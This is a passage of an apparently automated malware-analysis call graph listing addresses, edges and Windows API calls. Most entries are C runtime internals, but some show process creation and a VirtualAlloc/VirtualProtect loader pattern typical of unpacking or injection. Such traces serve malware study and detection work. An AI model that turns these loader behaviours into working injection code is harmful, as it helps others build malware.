16776->16781 16777->16689 16778->16777 16780 7fef9d2bd70 _invalid_parameter 17 API calls 16779->16780 16780->16777 16781->16777 16782 7fef9d2bd70 _invalid_parameter 17 API calls 16781->16782 16782->16777 16784 7fef9d386b0 _wcsftime_l 17 API calls 16783->16784 16785 7fef9d315de 16784->16785 16785->16716 16786->16728 16788 7fef9d2b48d 16787->16788 16789 7fef9d2b4ce GetModuleFileNameW 16788->16789 16790 7fef9d2b4c4 16788->16790 16791 7fef9d2b4f2 16789->16791 16797 7fef9d2b538 16789->16797 16793 7fef9d23280 __GSHandlerCheck 8 API calls 16790->16793 16792 7fef9d31640 17 API calls 16791->16792 16794 7fef9d2b50b 16792->16794 16795 7fef9d2ba58 16793->16795 16796 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16794->16796 16795->16703 16796->16797 16801 7fef9d2b5f2 16797->16801 16851 7fef9d30fd0 16797->16851 16799 7fef9d2b5c5 16800 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16799->16800 16800->16801 16802 7fef9d31590 _snwprintf_s 17 API calls 16801->16802 16803 7fef9d2b940 16802->16803 16804 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16803->16804 16805 7fef9d2b998 16803->16805 16804->16805 16806 7fef9d31640 17 API calls 16805->16806 16809 7fef9d2b9f6 16805->16809 16807 7fef9d2b9c9 16806->16807 16808 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16807->16808 16808->16809 16809->16790 16861 7fef9d2cff0 16809->16861 16815 7fef9d38d25 16813->16815 16814 7fef9d38d7b 16816 7fef9d2bd70 _invalid_parameter 17 API calls 16814->16816 16815->16814 16817 7fef9d38db9 16815->16817 16826 7fef9d38daf 16816->16826 16818 7fef9d38e1a 16817->16818 16820 7fef9d38e58 _calloc_dbg_impl 16817->16820 16819 7fef9d2bd70 _invalid_parameter 17 API calls 16818->16819 16819->16826 16821 7fef9d38f5d 16820->16821 16822 7fef9d38f9b 16820->16822 16823 7fef9d2bd70 _invalid_parameter 17 API calls 16821->16823 16824 7fef9d3900e 16822->16824 16827 7fef9d3904c 16822->16827 16823->16826 16825 7fef9d2bd70 _invalid_parameter 17 API calls 16824->16825 16825->16826 16826->16756 16827->16826 16828 7fef9d2bd70 _invalid_parameter 17 API calls 16827->16828 16828->16826 16831 7fef9d386e6 16829->16831 16830 7fef9d3873c 16832 7fef9d2bd70 _invalid_parameter 17 API calls 16830->16832 16831->16830 16835 7fef9d3877a 16831->16835 16841 7fef9d38770 _calloc_dbg_impl 16832->16841 16833 7fef9d3880e 16838 7fef9d2bd70 _invalid_parameter 17 API calls 16833->16838 16834 7fef9d3884c 16836 7fef9d38992 16834->16836 16837 7fef9d38862 16834->16837 16835->16833 16835->16834 16835->16841 16839 7fef9d38350 _wcsftime_l 17 API calls 16836->16839 16844 7fef9d38350 16837->16844 16838->16841 16842 7fef9d388b1 _calloc_dbg_impl 16839->16842 16841->16759 16842->16841 16843 7fef9d2bd70 _invalid_parameter 17 API calls 16842->16843 16843->16841 16845 7fef9d3839b 16844->16845 16846 7fef9d383f1 16845->16846 16848 7fef9d3842f 16845->16848 16847 7fef9d2bd70 _invalid_parameter 17 API calls 16846->16847 16850 7fef9d38425 16847->16850 16849 7fef9d2bd70 _invalid_parameter 17 API calls 16848->16849 16848->16850 16849->16850 16850->16842 16852 7fef9d30ff7 16851->16852 16854 7fef9d30ff0 __SehTransFilter 16851->16854 16853 7fef9d31055 16852->16853 16856 7fef9d31093 _calloc_dbg_impl 16852->16856 16855 7fef9d2bd70 _invalid_parameter 17 API calls 16853->16855 16854->16799 16855->16854 16856->16854 16857 7fef9d3111a 16856->16857 16859 7fef9d31158 16856->16859 16858 7fef9d2bd70 _invalid_parameter 17 API calls 16857->16858 16858->16854 16859->16854 16860 7fef9d2bd70 _invalid_parameter 17 API calls 16859->16860 16860->16854 16863 7fef9d2d02a 16861->16863 16862 7fef9d2d1d8 DecodePointer 16864 7fef9d2d1e8 16862->16864 16863->16862 16866 7fef9d2bd70 _invalid_parameter 17 API calls 16863->16866 16865 7fef9d2ba2b 16864->16865 16867 7fef9d27090 _exit 33 API calls 16864->16867 16869 7fef9d2d209 16864->16869 16873 7fef9d27090 16865->16873 16868 7fef9d2d1ce 16866->16868 16867->16869 16868->16862 16868->16865 16871 7fef9d2d289 16869->16871 16876 7fef9d23d00 RtlEncodePointer 16869->16876 16871->16865 16877 7fef9d29360 LeaveCriticalSection 16871->16877 16874 7fef9d27280 _exit 33 API calls 16873->16874 16875 7fef9d270a9 16874->16875 16875->16790 16876->16871 16877->16865 16878 7fef9d2ae14 16879 7fef9d2b390 16878->16879 16880 7fef9d23280 __GSHandlerCheck 8 API calls 16879->16880 16881 7fef9d2b3a0 16880->16881 17919 7fef9d32c10 17920 7fef9d32c53 17919->17920 17921 7fef9d32c24 _updatetlocinfoEx_nolock 17919->17921 17923 7fef9d29360 LeaveCriticalSection 17921->17923 17923->17920 17924 7fef9d3d410 17929 7fef9d3d3e0 17924->17929 17927 7fef9d3d43c 17928 7fef9d3d710 _Ref_count LeaveCriticalSection 17928->17927 17932 7fef9d40070 17929->17932 17935 7fef9d40083 _free_nolock 17932->17935 17934 7fef9d3d402 17934->17927 17934->17928 17936 7fef9d29360 LeaveCriticalSection 17935->17936 17936->17934 18478 180024ee6 18479 180024eea 18478->18479 18480 180024f52 18478->18480 18481 18002506a CreateProcessW 18480->18481 17937 7fef9d27816 17940 7fef9d27826 _calloc_dbg 17937->17940 17938 7fef9d27ab9 17939 7fef9d27ce0 SetHandleCount 17938->17939 17943 7fef9d27b95 GetStdHandle 17938->17943 17945 7fef9d27c7b 17938->17945 17944 7fef9d27aaf 17939->17944 17940->17938 17941 7fef9d27a32 InitializeCriticalSectionAndSpinCount 17940->17941 17942 7fef9d27a19 GetFileType 17940->17942 17941->17938 17941->17944 17942->17938 17942->17941 17943->17945 17946 7fef9d27bb9 17943->17946 17945->17939 17946->17945 17947 7fef9d27bc8 GetFileType 17946->17947 17947->17945 17948 7fef9d27beb InitializeCriticalSectionAndSpinCount 17947->17948 17948->17944 17948->17945 16502 7fef9d2461b 16505 7fef9d24625 _calloc_dbg_impl 16502->16505 16504 7fef9d248be 16506 7fef9d29360 LeaveCriticalSection 16505->16506 16506->16504 16888 7fef9d36203 16889 7fef9d3616e _CrtMemDumpAllObjectsSince wcsxfrm 16888->16889 16890 7fef9d36238 MultiByteToWideChar 16889->16890 16891 7fef9d361c8 _LocaleUpdate::~_LocaleUpdate 16889->16891 16890->16891 16630 1800178f4 16633 18000ffc0 16630->16633 16632 180017924 16637 18001000e 16633->16637 16634 180011bd0 16645 1800053b0 16634->16645 16637->16634 16638 1800116b2 16637->16638 16639 18001667c 16637->16639 16638->16632 16640 1800166ac 16639->16640 16643 180016ad3 16640->16643 16649 180023624 16640->16649 16653 18000bc98 16640->16653 16657 1800270c0 16640->16657 16643->16637 16647 1800053e0 16645->16647 16646 18001a10c CreateProcessW 16648 18000598b 16646->16648 16647->16646 16647->16648 16648->16638 16652 180023662 16649->16652 16651 1800237ae 16651->16640 16652->16651 16661 18001a10c 16652->16661 16654 18000bcde 16653->16654 16655 18001a10c CreateProcessW 16654->16655 16656 18000c521 16654->16656 16655->16656 16656->16640 16660 180027157 16657->16660 16658 180027fe1 16658->16640 16659 18001a10c CreateProcessW 16659->16660 16660->16658 16660->16659 16662 18001a166 16661->16662 16663 180024f28 CreateProcessW 16662->16663 16664 18001a335 16663->16664 16664->16651 16892 7fef9d40204 16895 7fef9d4023d 16892->16895 16894 7fef9d403d7 16895->16894 16896 7fef9d40326 16895->16896 16898 7fef9d3ab10 16895->16898 16896->16894 16902 7fef9d39290 16896->16902 16899 7fef9d3ab23 16898->16899 16900 7fef9d3ab35 16898->16900 16899->16896 16900->16899 16901 7fef9d2bd70 _invalid_parameter 17 API calls 16900->16901 16901->16899 16903 7fef9d392d8 16902->16903 16908 7fef9d392b6 __doserrno 16902->16908 16904 7fef9d39341 __doserrno 16903->16904 16910 7fef9d3938c 16903->16910 16906 7fef9d2bd70 _invalid_parameter 17 API calls 16904->16906 16905 7fef9d3945b 16916 7fef9d3fae0 16905->16916 16906->16908 16908->16894 16910->16905 16911 7fef9d39410 __doserrno 16910->16911 16913 7fef9d2bd70 _invalid_parameter 17 API calls 16911->16913 16913->16908 16914 7fef9d394a6 __doserrno 16930 7fef9d3fbc0 LeaveCriticalSection 16914->16930 16917 7fef9d3fb7a 16916->16917 16920 7fef9d3fb25 16916->16920 16918 7fef9d39464 16917->16918 16919 7fef9d3fb81 EnterCriticalSection 16917->16919 16918->16914 16924 7fef9d39520 16918->16924 16919->16918 16921 7fef9d3fb56 16920->16921 16922 7fef9d3fb3b InitializeCriticalSectionAndSpinCount 16920->16922 16931 7fef9d29360 LeaveCriticalSection 16921->16931 16922->16921 16932 7fef9d3f900 16924->16932 16926 7fef9d39545 16927 7fef9d3959d SetFilePointer 16926->16927 16929 7fef9d39552 _dosmaperr 16926->16929 16928 7fef9d395c1 GetLastError 16927->16928 16927->16929 16928->16929 16929->16914 16930->16908 16931->16917 16933 7fef9d3f935 16932->16933 16935 7fef9d3f913 __doserrno 16932->16935 16934 7fef9d3f99e __doserrno 16933->16934 16937 7fef9d3f9e9 __doserrno 16933->16937 16936 7fef9d2bd70 _invalid_parameter 17 API calls 16934->16936 16935->16926 16936->16935 16937->16935 16938 7fef9d2bd70 _invalid_parameter 17 API calls 16937->16938 16938->16935 16939 7fef9d41200 16942 7fef9d2ed30 16939->16942 16941 7fef9d41212 _IsExceptionObjectToBeDestroyed __SehTransFilter 16943 7fef9d2ed3e 16942->16943 16945 7fef9d2ed4c 16943->16945 16948 7fef9d2cf80 DecodePointer 16943->16948 16946 7fef9d2cf80 _inconsistency 36 API calls 16945->16946 16947 7fef9d2ed88 16945->16947 16946->16947 16947->16941 16949 7fef9d2cf9e 16948->16949 16952 7fef9d2cf50 16949->16952 16954 7fef9d2cf59 16952->16954 16956 7fef9d339e0 16954->16956 16957 7fef9d339fa 16956->16957 16966 7fef9d2d430 DecodePointer 16957->16966 16959 7fef9d33a09 16960 7fef9d33a20 16959->16960 16961 7fef9d2cff0 terminate 34 API calls 16959->16961 16962 7fef9d33a42 16960->16962 16963 7fef9d2be50 _invoke_watson_if_oneof 14 API calls 16960->16963 16961->16960 16964 7fef9d27090 _exit 33 API calls 16962->16964 16963->16962 16965 7fef9d2cf78 16964->16965 16965->16945 16966->16959 17463 7fef9d23909 17464 7fef9d23913 __SehTransFilter 17463->17464 17465 7fef9d239db __SehTransFilter 17464->17465 17466 7fef9d23a71 RtlUnwindEx 17464->17466 17466->17465 17955 7fef9d23409 17956 7fef9d23e00 3 API calls 17955->17956 17957 7fef9d2340e 17956->17957 17960 7fef9d288d0 HeapDestroy 17957->17960 17959 7fef9d23413 17960->17959 18523 7fef9d3c30d 18524 7fef9d3c31a get_int64_arg _get_printf_count_output 18523->18524 18525 7fef9d3c39d 18524->18525 18526 7fef9d3c3f2 18524->18526 18527 7fef9d2bd70 _invalid_parameter 17 API calls 18525->18527 18533 7fef9d3b530 wctomb_s 19 API calls 18526->18533 18535 7fef9d3b99c 18526->18535 18530 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18527->18530 18528 7fef9d3cc93 18528->18530 18532 7fef9d2bd70 _invalid_parameter 17 API calls 18528->18532 18529 7fef9d23280 __GSHandlerCheck 8 API calls 18531 7fef9d3cd90 18529->18531 18530->18529 18532->18530 18533->18526 18534 7fef9d3bada 18536 7fef9d2bd70 _invalid_parameter 17 API calls 18534->18536 18535->18528 18535->18534 18536->18530 16419 7fef9d23d30 16437 7fef9d27540 16419->16437 16424 7fef9d23d4e FlsAlloc 16427 7fef9d23d73 _calloc_dbg 16424->16427 16428 7fef9d23d6a 16424->16428 16425 7fef9d23d42 16426 7fef9d23e00 3 API calls 16425->16426 16429 7fef9d23d47 16426->16429 16431 7fef9d23da4 FlsSetValue 16427->16431 16432 7fef9d23db9 16427->16432 16430 7fef9d23e00 3 API calls 16428->16430 16430->16429 16431->16432 16433 7fef9d23dc2 16431->16433 16434 7fef9d23e00 3 API calls 16432->16434 16446 7fef9d23e30 16433->16446 16434->16429 16452 7fef9d23d00 RtlEncodePointer 16437->16452 16439 7fef9d27549 _initp_misc_winsig 16453 7fef9d2cf20 EncodePointer 16439->16453 16441 7fef9d23d39 16442 7fef9d28fe0 16441->16442 16445 7fef9d28ff6 16442->16445 16443 7fef9d29022 InitializeCriticalSectionAndSpinCount 16444 7fef9d23d3e 16443->16444 16443->16445 16444->16424 16444->16425 16445->16443 16445->16444 16447 7fef9d23ead 16446->16447 16454 7fef9d29360 LeaveCriticalSection 16447->16454 16449 7fef9d23ec7 _updatetlocinfoEx_nolock 16455 7fef9d29360 LeaveCriticalSection 16449->16455 16451 7fef9d23dce GetCurrentThreadId 16451->16429 16452->16439 16453->16441 16454->16449 16455->16451 17467 7fef9d23130 17468 7fef9d23170 __GSHandlerCheck 8 API calls 17467->17468 17469 7fef9d23160 17468->17469 17961 7fef9d2e830 17962 7fef9d2e857 17961->17962 17963 7fef9d33cc0 __SehTransFilter 39 API calls 17962->17963 17964 7fef9d2e8e3 17963->17964 17965 7fef9d3c435 17966 7fef9d3c479 _CrtMemDumpAllObjectsSince 17965->17966 17967 7fef9d3c598 DecodePointer 17966->17967 17968 7fef9d3c60d _CrtMemDumpAllObjectsSince 17967->17968 17969 7fef9d3c62b DecodePointer 17968->17969 17970 7fef9d3c652 _CrtMemDumpAllObjectsSince 17968->17970 17969->17970 17971 7fef9d3c676 DecodePointer 17970->17971 17980 7fef9d3c69d std::exception::_Copy_str 17970->17980 17971->17980 17972 7fef9d3b99c 17973 7fef9d3cc93 17972->17973 17978 7fef9d3bada 17972->17978 17974 7fef9d2bd70 _invalid_parameter 17 API calls 17973->17974 17977 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17973->17977 17974->17977 17975 7fef9d3b530 wctomb_s 19 API calls 17975->17980 17976 7fef9d23280 __GSHandlerCheck 8 API calls 17979 7fef9d3cd90 17976->17979 17977->17976 17981 7fef9d2bd70 _invalid_parameter 17 API calls 17978->17981 17980->17972 17980->17975 17981->17977 16465 7fef9d23433 16466 7fef9d23437 16465->16466 16467 7fef9d23446 16465->16467 16468 7fef9d27d00 _ioterm DeleteCriticalSection 16466->16468 16469 7fef9d2343c 16468->16469 16470 7fef9d23e00 3 API calls 16469->16470 16471 7fef9d23441 16470->16471 16473 7fef9d288d0 HeapDestroy 16471->16473 16473->16467 17982 7fef9d3d830 17983 7fef9d3d8aa 17982->17983 17984 7fef9d3d97b 17983->17984 17985 7fef9d3d926 17983->17985 17987 7fef9d3d9ee 17984->17987 17993 7fef9d3da43 17984->17993 17986 7fef9d2bd70 _invalid_parameter 17 API calls 17985->17986 17990 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17986->17990 17988 7fef9d2bd70 _invalid_parameter 17 API calls 17987->17988 17988->17990 17989 7fef9d23280 __GSHandlerCheck 8 API calls 17991 7fef9d3ed9e 17989->17991 17990->17989 17992 7fef9d3eca1 17992->17990 17994 7fef9d2bd70 _invalid_parameter 17 API calls 17992->17994 17993->17992 17995 7fef9d3dbb5 17993->17995 17994->17990 17996 7fef9d2bd70 _invalid_parameter 17 API calls 17995->17996 17996->17990 17997 7fef9d26c32 17998 7fef9d26c3c 17997->17998 17999 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17998->17999 18000 7fef9d26c7a _CrtMemDumpAllObjectsSince 17998->18000 18001 7fef9d23280 __GSHandlerCheck 8 API calls 17999->18001 18003 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 18000->18003 18004 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 18000->18004 18002 7fef9d26e89 18001->18002 18003->18004 18005 7fef9d2c0c0 _swprintf_p 17 API calls 18004->18005 18007 7fef9d26dc7 18005->18007 18006 7fef9d26e12 18007->18006 18008 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18007->18008 18008->18006 16976 7fef9d33e3b 16977 7fef9d33ec7 16976->16977 16980 7fef9d2e790 16977->16980 16987 7fef9d2e500 16980->16987 16984 7fef9d2e7d0 __SehTransFilter 16995 7fef9d34f20 16984->16995 16986 7fef9d2e81e 16988 7fef9d33b40 __StateFromControlPc 36 API calls 16987->16988 16989 7fef9d2e539 16988->16989 16990 7fef9d2e5c2 RtlLookupFunctionEntry 16989->16990 16991 7fef9d2e601 16989->16991 16990->16991 16992 7fef9d33b40 16991->16992 17002 7fef9d33a60 16992->17002 17008 7fef9d33b70 16995->17008 16997 7fef9d2cf80 _inconsistency 36 API calls 17001 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 16997->17001 16998 7fef9d35103 16999 7fef9d3514a __SetState 16998->16999 17000 7fef9d2cf80 _inconsistency 36 API calls 16998->17000 16999->16986 17000->16999 17001->16997 17001->16998 17003 7fef9d33a7b 17002->17003 17004 7fef9d33a7d 17002->17004 17006 7fef9d2cf80 _inconsistency 36 API calls 17003->17006 17007 7fef9d33aa5 17003->17007 17005 7fef9d2cf80 _inconsistency 36 API calls 17004->17005 17005->17003 17006->17007 17007->16984 17009 7fef9d33b9a 17008->17009 17010 7fef9d33ba9 17008->17010 17011 7fef9d33b40 __StateFromControlPc 36 API calls 17009->17011 17010->17001 17011->17010 16495 18001a10c 16496 18001a166 16495->16496 16499 180024f28 16496->16499 16498 18001a335 16500 180024fcb 16499->16500 16501 18002506a CreateProcessW 16500->16501 16501->16498 18009 7fef9d2443c 18010 7fef9d2444c 18009->18010 18013 7fef9d29360 LeaveCriticalSection 18010->18013 18012 7fef9d248be 18013->18012 17490 7fef9d39939 17491 7fef9d39951 __doserrno 17490->17491 17492 7fef9d2bd70 _invalid_parameter 17 API calls 17491->17492 17493 7fef9d399d7 17492->17493 17494 7fef9d23280 __GSHandlerCheck 8 API calls 17493->17494 17495 7fef9d3a9f5 17494->17495 18014 7fef9d3e424 18015 7fef9d3e469 _CrtMemDumpAllObjectsSince 18014->18015 18016 7fef9d3e588 DecodePointer 18015->18016 18017 7fef9d3e5fd _CrtMemDumpAllObjectsSince 18016->18017 18018 7fef9d3e61b DecodePointer 18017->18018 18019 7fef9d3e642 _CrtMemDumpAllObjectsSince 18017->18019 18018->18019 18020 7fef9d3e666 DecodePointer 18019->18020 18022 7fef9d3e68d std::exception::_Copy_str 18019->18022 18020->18022 18021 7fef9d3eadf 18024 7fef9d3ef10 25 API calls 18021->18024 18022->18021 18023 7fef9d3eec0 25 API calls 18022->18023 18031 7fef9d3da75 18022->18031 18023->18021 18025 7fef9d3eafd 18024->18025 18026 7fef9d3eb33 18025->18026 18028 7fef9d3eec0 25 API calls 18025->18028 18027 7fef9d3ec29 18026->18027 18041 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18026->18041 18029 7fef9d3ebda 18027->18029 18030 7fef9d3ef10 25 API calls 18027->18030 18028->18026 18029->18031 18034 7fef9d3eec0 25 API calls 18029->18034 18030->18029 18032 7fef9d3eca1 18031->18032 18037 7fef9d3dbb5 18031->18037 18033 7fef9d2bd70 _invalid_parameter 17 API calls 18032->18033 18036 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18032->18036 18033->18036 18034->18031 18035 7fef9d23280 __GSHandlerCheck 8 API calls 18038 7fef9d3ed9e 18035->18038 18036->18035 18040 7fef9d2bd70 _invalid_parameter 17 API calls 18037->18040 18039 7fef9d3f000 wcsxfrm 2 API calls 18039->18041 18040->18036 18041->18029 18041->18039 18042 7fef9d3ee40 25 API calls 18041->18042 18042->18041 17012 7fef9d25a25 17013 7fef9d25a37 17012->17013 17014 7fef9d2bd70 _invalid_parameter 17 API calls 17013->17014 17015 7fef9d25aaf 17014->17015 17496 7fef9d34920 17499 7fef9d3d530 17496->17499 17502 7fef9d3d580 17499->17502 17503 7fef9d3d59a std::exception::_Tidy 17502->17503 17505 7fef9d3493d 17502->17505 17503->17505 17506 7fef9d3d660 17503->17506 17507 7fef9d3d676 std::exception::_Copy_str malloc 17506->17507 17509 7fef9d3d6bf 17506->17509 17508 7fef9d2d490 std::exception::_Copy_str 17 API calls 17507->17508 17507->17509 17508->17509 17509->17505 18545 7fef9d29328 18546 7fef9d29336 EnterCriticalSection 18545->18546 18547 7fef9d2932c 18545->18547 18547->18546 16670 3b0000 16671 3b0183 16670->16671 16672 3b043e VirtualAlloc 16671->16672 16676 3b0462 16672->16676 16673 3b0a00 16674 3b0531 GetNativeSystemInfo 16674->16673 16675 3b056d VirtualAlloc 16674->16675 16678 3b058b 16675->16678 16676->16673 16676->16674 16677 3b09d9 VirtualProtect 16677->16678 16678->16673 16678->16677 16678->16678 18548 7fef9d3ff2d 18549 7fef9d3ff37 18548->18549 18550 7fef9d40042 18549->18550 18551 7fef9d3ff47 18549->18551 18563 7fef9d29360 LeaveCriticalSection 18550->18563 18552 7fef9d4003d 18551->18552 18555 7fef9d3ae90 _lock_file2 EnterCriticalSection 18551->18555 18554 7fef9d4004c 18557 7fef9d3ff97 18555->18557 18556 7fef9d3ffd0 18558 7fef9d3af60 _unlock_file2 2 API calls 18556->18558 18557->18556 18559 7fef9d3ffe1 18557->18559 18560 7fef9d3ffbb 18557->18560 18558->18552 18559->18556 18562 7fef9d3fd70 _fflush_nolock 25 API calls 18559->18562 18561 7fef9d3fd70 _fflush_nolock 25 API calls 18560->18561 18561->18556 18562->18556 18563->18554 17514 7fef9d2b12b 17515 7fef9d2b14c 17514->17515 17517 7fef9d2b2e0 17515->17517 17518 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17515->17518 17516 7fef9d2b33e 17530 7fef9d30cc0 17516->17530 17517->17516 17519 7fef9d2d490 std::exception::_Copy_str 17 API calls 17517->17519 17518->17517 17521 7fef9d2b311 17519->17521 17523 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17521->17523 17523->17516 17524 7fef9d2b37d 17528 7fef9d23280 __GSHandlerCheck 8 API calls 17524->17528 17525 7fef9d2cff0 terminate 34 API calls 17526 7fef9d2b373 17525->17526 17527 7fef9d27090 _exit 33 API calls 17526->17527 17527->17524 17529 7fef9d2b3a0 17528->17529 17548 7fef9d23d00 RtlEncodePointer 17530->17548 17532 7fef9d30cf6 17533 7fef9d30d23 LoadLibraryW 17532->17533 17534 7fef9d30e15 17532->17534 17535 7fef9d30d44 GetProcAddress 17533->17535 17543 7fef9d30d3d 17533->17543 17537 7fef9d30e39 DecodePointer DecodePointer 17534->17537 17547 7fef9d30e68 17534->17547 17536 7fef9d30d6a 7 API calls 17535->17536 17535->17543 17536->17534 17540 7fef9d30df3 GetProcAddress EncodePointer 17536->17540 17537->17547 17538 7fef9d30f60 DecodePointer 17538->17543 17539 7fef9d23280 __GSHandlerCheck 8 API calls 17544 7fef9d2b358 17539->17544 17540->17534 17541 7fef9d30eed DecodePointer 17542 7fef9d30f0d 17541->17542 17542->17538 17545 7fef9d30f2f DecodePointer 17542->17545 17543->17539 17544->17524 17544->17525 17545->17538 17546 7fef9d30ec8 17545->17546 17546->17538 17547->17541 17547->17542 17547->17546 17548->17532 17549 7fef9d234d5 17550 7fef9d234da _calloc_dbg 17549->17550 17551 7fef9d2350b FlsSetValue 17550->17551 17555 7fef9d23548 17550->17555 17552 7fef9d23520 17551->17552 17551->17555 17553 7fef9d23e30 LeaveCriticalSection 17552->17553 17554 7fef9d2352c GetCurrentThreadId 17553->17554 17554->17555 18564 7fef9d25ad9 18565 7fef9d25add 18564->18565 18566 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18565->18566 18567 7fef9d25b3a 18566->18567 18570 7fef9d29360 LeaveCriticalSection 18567->18570 18569 7fef9d25c14 18570->18569 18043 7fef9d233d6 18046 7fef9d288d0 HeapDestroy 18043->18046 18045 7fef9d233db 18046->18045 18582 7fef9d266da 18583 7fef9d26725 18582->18583 18586 7fef9d26745 18582->18586 18583->18586 18588 7fef9d29a70 18583->18588 18584 7fef9d2677f 18586->18584 18587 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18586->18587 18587->18584 18590 7fef9d29a79 _updatetlocinfoEx_nolock 18588->18590 18589 7fef9d29ad8 18589->18586 18590->18589 18592 7fef9d29360 LeaveCriticalSection 18590->18592 18592->18589 17556 7fef9d268c4 17557 7fef9d268d1 17556->17557 17558 7fef9d26ba6 17557->17558 17561 7fef9d268ed _CrtIsValidPointer 17557->17561 17574 7fef9d29360 LeaveCriticalSection 17558->17574 17560 7fef9d26bb0 17562 7fef9d2695e IsBadReadPtr 17561->17562 17564 7fef9d26976 17561->17564 17573 7fef9d2692f 17561->17573 17562->17564 17563 7fef9d26ad2 17566 7fef9d26b2d 17563->17566 17567 7fef9d26add 17563->17567 17564->17563 17565 7fef9d26a29 17564->17565 17568 7fef9d26abe 17565->17568 17569 7fef9d26a86 IsBadReadPtr 17565->17569 17572 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17566->17572 17566->17573 17571 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17567->17571 17570 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17568->17570 17569->17568 17569->17573 17570->17573 17571->17573 17572->17573 17574->17560 18593 7fef9d376c0 18594 7fef9d376cf _CrtMemDumpAllObjectsSince 18593->18594 18595 7fef9d37be3 _CrtMemDumpAllObjectsSince 18593->18595 18597 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18594->18597 18598 7fef9d37905 _CrtMemDumpAllObjectsSince 18594->18598 18599 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18594->18599 18596 7fef9d37cc6 WideCharToMultiByte 18595->18596 18595->18597 18596->18597 18600 7fef9d23280 __GSHandlerCheck 8 API calls 18597->18600 18601 7fef9d3790f WideCharToMultiByte 18598->18601 18604 7fef9d37827 WideCharToMultiByte 18599->18604 18602 7fef9d37d85 18600->18602 18603 7fef9d37965 18601->18603 18603->18597 18605 7fef9d3799a GetLastError 18603->18605 18604->18597 18605->18597 18607 7fef9d379d3 _CrtMemDumpAllObjectsSince 18605->18607 18606 7fef9d37a05 WideCharToMultiByte 18606->18597 18606->18607 18607->18597 18607->18606 18059 7fef9d2f7f1 18060 7fef9d2f80d 18059->18060 18080 7fef9d2f8de _wcsftime_l 18059->18080 18116 7fef9d36fb0 18060->18116 18062 7fef9d2fa70 18123 7fef9d369c0 18062->18123 18064 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18067 7fef9d2f85a OutputDebugStringA 18064->18067 18066 7fef9d2f9f4 18066->18062 18069 7fef9d2d490 std::exception::_Copy_str 17 API calls 18066->18069 18070 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 18067->18070 18068 7fef9d2fa8a 18071 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18068->18071 18072 7fef9d2fa43 18069->18072 18076 7fef9d2f8ce 18070->18076 18074 7fef9d2fab7 18071->18074 18075 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18072->18075 18077 7fef9d2fb24 18074->18077 18078 7fef9d369c0 17 API calls 18074->18078 18092 7fef9d2fb6a 18074->18092 18075->18062 18085 7fef9d23280 __GSHandlerCheck 8 API calls 18076->18085 18079 7fef9d369c0 17 API calls 18077->18079 18081 7fef9d2faf7 18078->18081 18082 7fef9d2fb3d 18079->18082 18080->18066 18086 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18080->18086 18087 7fef9d2f996 18080->18087 18083 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18081->18083 18084 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18082->18084 18083->18077 18084->18092 18088 7fef9d3011d 18085->18088 18086->18087 18087->18066 18089 7fef9d2d490 std::exception::_Copy_str 17 API calls 18087->18089 18090 7fef9d2f9c7 18089->18090 18091 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18090->18091 18091->18066 18093 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18092->18093 18094 7fef9d2fc39 18092->18094 18093->18094 18095 7fef9d2fc97 18094->18095 18096 7fef9d2d490 std::exception::_Copy_str 17 API calls 18094->18096 18136 7fef9d36970 18095->18136 18097 7fef9d2fc6a 18096->18097 18099 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18097->18099 18099->18095 18101 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18102 7fef9d2fd6e 18101->18102 18103 7fef9d2fdbb 18102->18103 18104 7fef9d31640 17 API calls 18102->18104 18106 7fef9d2ff03 std::exception::_Copy_str 18103->18106 18139 7fef9d29360 LeaveCriticalSection 18103->18139 18105 7fef9d2fd8e 18104->18105 18107 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18105->18107 18106->18076 18108 7fef9d2ffef 18106->18108 18112 7fef9d2ffaa WriteFile 18106->18112 18107->18103 18109 7fef9d30008 OutputDebugStringA 18108->18109 18110 7fef9d30016 18108->18110 18109->18110 18110->18076 18113 7fef9d36fb0 _itow_s 17 API calls 18110->18113 18112->18108 18114 7fef9d30065 18113->18114 18115 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18114->18115 18115->18076 18117 7fef9d37003 18116->18117 18118 7fef9d36fd6 18116->18118 18120 7fef9d37030 _itow_s 17 API calls 18117->18120 18118->18117 18119 7fef9d36fdd 18118->18119 18140 7fef9d37030 18119->18140 18122 7fef9d2f82d 18120->18122 18122->18064 18124 7fef9d369e1 18123->18124 18125 7fef9d36a42 18124->18125 18127 7fef9d36a80 _calloc_dbg_impl 18124->18127 18126 7fef9d2bd70 _invalid_parameter 17 API calls 18125->18126 18132 7fef9d36a76 _calloc_dbg_impl 18126->18132 18128 7fef9d36b6e 